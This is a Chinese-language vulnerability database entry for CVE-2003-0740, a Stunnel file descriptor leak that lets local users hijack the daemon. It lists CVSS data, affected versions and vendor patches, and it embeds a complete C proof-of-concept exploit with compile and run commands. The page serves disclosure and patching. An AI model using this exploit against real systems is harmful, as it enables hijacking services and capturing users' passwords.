CVE-2003-0740
CVSS4.6
发布时间 :2003-10-20 00:00:00
修订时间 :2016-10-17 22:37:06
NMCOES    

[原文]Stunnel 4.00, and 3.24 and earlier, leaks a privileged file descriptor returned by listen(), which allows local users to hijack the Stunnel server.


[CNNVD]Stunnel泄露文件描述符漏洞(CNNVD-200310-047)

        
        Stunnel是一款允许用户加密任意TCP会话连接的程序,能使非SSL加密应用程序和服务使用SSL加密。
        Stunnel存在文件描述符泄露问题,本地攻击者可以利用这个漏洞劫持Stunnel服务程序,可导致未授权连接加密通信等攻击。
        问题是由于没有使用CLOEXEC标记的fcntl调用来防止特权文件描述符泄露,通过listen()调用返回的文件描述符可被非特权进程使用。如果Stunnel可被用于通过任何本地程序如telnet等提供SHELL访问,那么用户的SHELL也会拥有被泄露的listen描述符,这表示任何N能通过SHELL访问的用户可以劫持stunnel服务程序。结果可导致非特权攻击者利用这个漏洞控制这个服务,收集密码等敏感信息,或者重定向服务到不同机器中。
        另外其他文件描述符也存在这个问题。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:stunnel:stunnel:3.20
cpe:/a:stunnel:stunnel:3.9
cpe:/a:stunnel:stunnel:3.10
cpe:/a:stunnel:stunnel:3.21
cpe:/a:stunnel:stunnel:3.21c
cpe:/a:stunnel:stunnel:3.8
cpe:/a:stunnel:stunnel:3.11
cpe:/a:stunnel:stunnel:3.21b
cpe:/a:stunnel:stunnel:3.22
cpe:/a:stunnel:stunnel:3.7
cpe:/a:stunnel:stunnel:3.21a
cpe:/a:stunnel:stunnel:3.16
cpe:/a:stunnel:stunnel:3.17
cpe:/a:stunnel:stunnel:4.0
cpe:/a:stunnel:stunnel:3.18
cpe:/a:stunnel:stunnel:3.19
cpe:/a:stunnel:stunnel:3.12
cpe:/a:stunnel:stunnel:3.13
cpe:/a:stunnel:stunnel:3.24
cpe:/a:stunnel:stunnel:3.14
cpe:/a:stunnel:stunnel:3.15
cpe:/a:stunnel:stunnel:3.3
cpe:/a:stunnel:stunnel:3.4a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0740
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0740
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-047
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000736
(UNKNOWN)  CONECTIVA  CLA-2003:736
http://marc.info/?l=bugtraq&m=106260760211958&w=2
(UNKNOWN)  BUGTRAQ  20030903 Stunnel-3.x Daemon Hijacking
http://www.mandriva.com/security/advisories?name=MDKSA-2003:108
(UNKNOWN)  MANDRAKE  MDKSA-2003:108
http://www.redhat.com/support/errata/RHSA-2003-297.html
(UNKNOWN)  REDHAT  RHSA-2003:297

- 漏洞信息

Stunnel泄露文件描述符漏洞
中危 其他
2003-10-20 00:00:00 2005-10-20 00:00:00
本地  
        
        Stunnel是一款允许用户加密任意TCP会话连接的程序,能使非SSL加密应用程序和服务使用SSL加密。
        Stunnel存在文件描述符泄露问题,本地攻击者可以利用这个漏洞劫持Stunnel服务程序,可导致未授权连接加密通信等攻击。
        问题是由于没有使用CLOEXEC标记的fcntl调用来防止特权文件描述符泄露,通过listen()调用返回的文件描述符可被非特权进程使用。如果Stunnel可被用于通过任何本地程序如telnet等提供SHELL访问,那么用户的SHELL也会拥有被泄露的listen描述符,这表示任何N能通过SHELL访问的用户可以劫持stunnel服务程序。结果可导致非特权攻击者利用这个漏洞控制这个服务,收集密码等敏感信息,或者重定向服务到不同机器中。
        另外其他文件描述符也存在这个问题。
        

- 公告与补丁

        厂商补丁:
        Stunnel
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Stunnel Upgrade stunnel-4.04.tar.gz
        
        http://www.stunnel.org/download/stunnel/src/stunnel-4.04.tar.gz

- 漏洞信息 (91)

Stunnel <= 3.24, 4.00 Daemon Hijacking Proof of Concept Exploit (EDBID:91)
linux local
2003-09-05 Verified
0 Steve Grubb
N/A [点击下载]
/* By Steve Grubb : The technique is simple. 
 *
 * 1) Fork so that stunnel can't find you when it dies.
 * 2) Send stunnel a SIGUSR2. Unhandled signals generally
 * kill programs. Since you are a child of stunnel, the OS
 * will deliver the signal.
 * 3) Select on the leaked descriptor and start serving pages.
 *
 * At the end of this advisory is a proof-of-concept
 * program that you can run under Stunnel. It is assumed
 * that Stunnel is providing you shell-like access (Telnet
 * over SSL, for example), or that the program lauched via
 * Stunnel has some exploitable condition that allows you
 * to run arbitrary code.
 * 
 * To run the POC code, you can execute it directly as the
 * local program (-l argument) for Stunnel :
 * 
 * /usr/sbin/stunnel -s nobody -g nobody -D 7 -p
 * /etc/ssl/certs/stunnel.pem -o /tmp/stunnel.log -P
 * /tmp/stunnel.pid -d 2222 -l
 * /opt/stunnel-sploit/leak-sploit -- leak-sploit
 * 
 * Then connect to stunnel like: lynx https://localhost:2222
 * 
 * The first time, you will get a message saying
 * "Unexpected network read error" followed by "Document
 * can't be accessed". Then connect again. The second
 * time, you will see the "You're owned" message. Doing a
 * ps -ef shows that stunnel is long gone and replaced by
 * the example application...even though user & group were
 * nobody. Sure its a bit contrived, but illustrates the concept.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
 * The basic scheme goes like this:
 *      1) Get rid of the parent
 *      2) init the openssl library
 *      3) start handling requests
 */

/* You may need to adjust these next 3 items */
#define LISTEN_DESCRIPTOR 6
#define CERTF "/opt/stunnel-sploit/foo-cert.pem"
#define KEYF  "/opt/stunnel-sploit/foo-cert.pem"

static SSL_CTX    *ctx;
static SSL        *ssl;
static X509       *client_cert;
static SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    int pid = getppid();

    /* Need to fork so stunnel doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();

        /* Goodbye - thanks for the descriptor */
        kill(pid, SIGUSR2);
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    return 0;
}

static void server_loop(int descr)
{
    struct timeval   tv;
    fd_set read_mask ;

    FD_SET(descr, &read_mask);
    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        if (select(descr+1, &read_mask, NULL, NULL, 0 )
== -1)
            continue;
        fd = accept(descr, &remote, &len);
        if (fd >=0) {
            char obuf[4096];

            if ((ssl = SSL_new (ctx)) != NULL) {
                SSL_set_fd (ssl, fd);
                SSL_set_accept_state(ssl);
                if ((SSL_accept (ssl)) == -1)
                    exit(1);
                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 40\n");
                strcat(obuf, "Content-Type:
text/html\n\n");
                strcat(obuf, "<html><body>You're
owned!</body></html>");
                SSL_write (ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl,
SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
                SSL_free (ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free (ctx);  /* Never gets called */
}

static void ssl_init(void)
{
    SSL_load_error_strings();
    SSLeay_add_ssl_algorithms();
    meth = SSLv23_server_method();
    ctx = SSL_CTX_new (meth);
    if (!ctx)
        exit(1);
    if (SSL_CTX_use_certificate_file(ctx, CERTF,
SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
SSL_FILETYPE_PEM) <= 0)
        exit(1);
    if (!SSL_CTX_check_private_key(ctx))
        exit(1);
}


// milw0rm.com [2003-09-05]
		

- 漏洞信息

6451
Stunnel File Descriptor Leak Session Hijack
Local Access Required
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2003-09-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.26, 4.04 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Stunnel Leaked File Descriptor Vulnerability
Failure to Handle Exceptional Conditions 8537
No Yes
2003-09-03 12:00:00 2009-07-11 11:56:00
Discovery of this issue has been credited to Steve Grubb <linux_4ever@yahoo.com>.

- 受影响的程序版本

Stunnel Stunnel 4.0 0
Stunnel Stunnel 3.24
Stunnel Stunnel 3.22
- Conectiva Linux 9.0
- Conectiva Linux 8.0
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
+ Sun Linux 5.0.7
Stunnel Stunnel 3.21 c
Stunnel Stunnel 3.21 b
Stunnel Stunnel 3.21 a
Stunnel Stunnel 3.21
Stunnel Stunnel 3.19
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
Stunnel Stunnel 3.18
Stunnel Stunnel 3.17
Stunnel Stunnel 3.16
Stunnel Stunnel 3.15
Stunnel Stunnel 3.14
- Conectiva Linux 7.0
Stunnel Stunnel 3.13
Stunnel Stunnel 3.12
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Stunnel Stunnel 3.11
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Stunnel Stunnel 3.9
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.8
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.7
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.4 a
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
Stunnel Stunnel 3.3
- Debian Linux 2.3
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1
- FreeBSD FreeBSD 4.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.5
- OpenBSD OpenBSD 2.4
- OpenBSD OpenBSD 2.3
- OpenBSD OpenBSD 2.1
- OpenBSD OpenBSD 2.0
- RedHat Linux 7.0
- RedHat Linux 6.0 x
- RedHat Linux 5.0
- Trustix Secure Linux 1.2
- Trustix Trustix Secure Linux 1.1
- Trustix Trustix Secure Linux 1.0
Stunnel Stunnel 3.20
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
Stunnel Stunnel 3.10
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Sun Solaris 8_sparc
- Sun Solaris 7.0
SGI ProPack 2.3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Mandriva Linux Mandrake 9.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Stunnel Stunnel 4.0 4
Stunnel Stunnel 4.0 3
Stunnel Stunnel 4.0 2
Stunnel Stunnel 4.0 1
Stunnel Stunnel 3.26

- 不受影响的程序版本

Stunnel Stunnel 4.0 4
Stunnel Stunnel 4.0 3
Stunnel Stunnel 4.0 2
Stunnel Stunnel 4.0 1
Stunnel Stunnel 3.26

- 漏洞讨论

Stunnel has been reported prone to a file descriptor leakage vulnerability. It has been reported that, file descriptors returned by a listen() call are made available to unprivileged processes. As a result, an unprivileged attacker may exploit this issue to hijack the Stunnel Server.

Other file descriptors are also reportedly leaked, which may also be potentially exploited in a similar manner.

- 漏洞利用

The following proof of code has been supplied:

To compile:
$(CC) $(CFLAGS) -o $@ leak-sploit.c -lssl

To run the POC code, you can execute it directly as the
local program (-l argument) for Stunnel :

/usr/sbin/stunnel -s nobody -g nobody -D 7 -p
/etc/ssl/certs/stunnel.pem -o /tmp/stunnel.log -P
/tmp/stunnel.pid -d 2222 -l
/opt/stunnel-sploit/leak-sploit -- leak-sploit

Then connect to stunnel like: lynx https://localhost:2222

- 解决方案

Conectiva has released an advisory (CLA-2003:736) to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisories RHSA-2003:297-07 and RHSA-2003:296-01 to address this issue. See the referenced advisories for additional details.

Mandrake has released a security advisory (MDKSA-2003:108) to address this issue in 9.0 and Corporate Server 2.1. Users are advised to upgrade as soon as possible.

SGI has released an advisory (20031103-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10033) containing updated RPM packages relating to a number of different BIDS.

Patch 10033 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10033, please see the attached advisory.

The vendor has released upgrades to address this issue:


Stunnel Stunnel 3.20

Stunnel Stunnel 3.10

MandrakeSoft Corporate Server 2.1

MandrakeSoft Corporate Server 2.1 x86_64

Stunnel Stunnel 3.11

Stunnel Stunnel 3.12

Stunnel Stunnel 3.13

Stunnel Stunnel 3.14

Stunnel Stunnel 3.15

Stunnel Stunnel 3.16

Stunnel Stunnel 3.17

Stunnel Stunnel 3.18

Stunnel Stunnel 3.19

Stunnel Stunnel 3.21

Stunnel Stunnel 3.21 c

Stunnel Stunnel 3.21 b

Stunnel Stunnel 3.21 a

Stunnel Stunnel 3.22

Stunnel Stunnel 3.24

Stunnel Stunnel 3.3

Stunnel Stunnel 3.4 a

Stunnel Stunnel 3.7

Stunnel Stunnel 3.8

Stunnel Stunnel 3.9

Stunnel Stunnel 4.0 0

Mandriva Linux Mandrake 9.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站